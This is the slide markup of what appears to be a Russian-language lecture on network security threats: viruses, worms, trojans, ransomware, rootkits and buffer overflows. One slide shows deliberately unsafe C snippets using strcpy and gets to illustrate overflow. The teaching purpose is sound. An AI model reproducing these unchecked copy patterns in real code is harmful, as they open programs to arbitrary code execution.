            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="423" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1428840"/>
            <a:ext cx="8927640" cy="5212800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>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Примеры:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>char buffer[10];</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3000"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>strcpy(buffer, argv[1]);</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3000"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>char *str = (char *)malloc(10</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>00</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>gets (str); </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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Часто оказываются уязвимыми плагины браузеров (банковские программы, flash,…)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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Позволяет внедрять и исполнять произвольный код</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="424" name="Text Box 3"/>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B3DD2081-49F6-49FB-9952-2748F462ECE5}"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5"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Угрозы безопасности</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="426" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1500120"/>
            <a:ext cx="8227440" cy="5141520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>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800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Вирусы </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>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400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>внедряют себя в исполняемый код других программ/документов</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>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800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Сетевые черви </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="2800"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>(отдельные программы). </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>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400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Пример: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Kido </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>или </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="2400"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>(12 миллионов компьютеров)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>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800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Троянские программы</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>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400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Скрывают свою настоящую </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="2400"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>природу, не распространяются </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="2400"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>саморазмножением</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="427" name="Picture 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5786280" y="3429000"/>
            <a:ext cx="2961720" cy="296964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7" name="Text Box 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357120" y="214200"/>
            <a:ext cx="7070040" cy="1140840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="95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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Понятие сетевой безопасности. Пример</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1981080"/>
            <a:ext cx="7770240" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="95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Безопасность электронной почты</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>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600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>посылать приватные сообщения</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>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600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>быть уверенным, что полученное сообщение послано именно отправителем</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>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600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>быть уверенным, что текст сообщения не поменялся по дороге</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2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8"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Угрозы безопасности</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="429" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1571760"/>
            <a:ext cx="8227440" cy="4855680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>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Программы-вымогатели</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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Сетевая разведка (сканирование портов, шпионские программы) </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3000"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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Заметание следов (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="224"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="249"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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Человеческий фактор</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="430" name="Text Box 3"/>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0BF012FE-A114-4A9B-A451-72B25D68C616}"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1"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Распределение видов атак</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="432" name="Picture 2" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="428760" y="1481040"/>
            <a:ext cx="8070120" cy="5446080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="433" name="Text Box 3"/>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3BEE9DFB-4A69-4245-B456-1F3B2A926124}"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4" name="Text Box 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1857240" y="466560"/>
            <a:ext cx="5309640" cy="888480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ct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4800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Методы защиты</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="435" name="Text Box 2"/>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9B647F74-D680-468F-9933-C02582132005}"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pic>
        <p:nvPicPr>
          <p:cNvPr id="436" name="Picture 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2973240" y="2500200"/>
            <a:ext cx="3025080" cy="3531600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="437" name="Picture 4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="214200" y="1644480"/>
            <a:ext cx="2212560" cy="2710800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="438" name="Picture 5" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6372360" y="1643040"/>
            <a:ext cx="2569680" cy="2569680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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9"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Методы защиты</a:t>
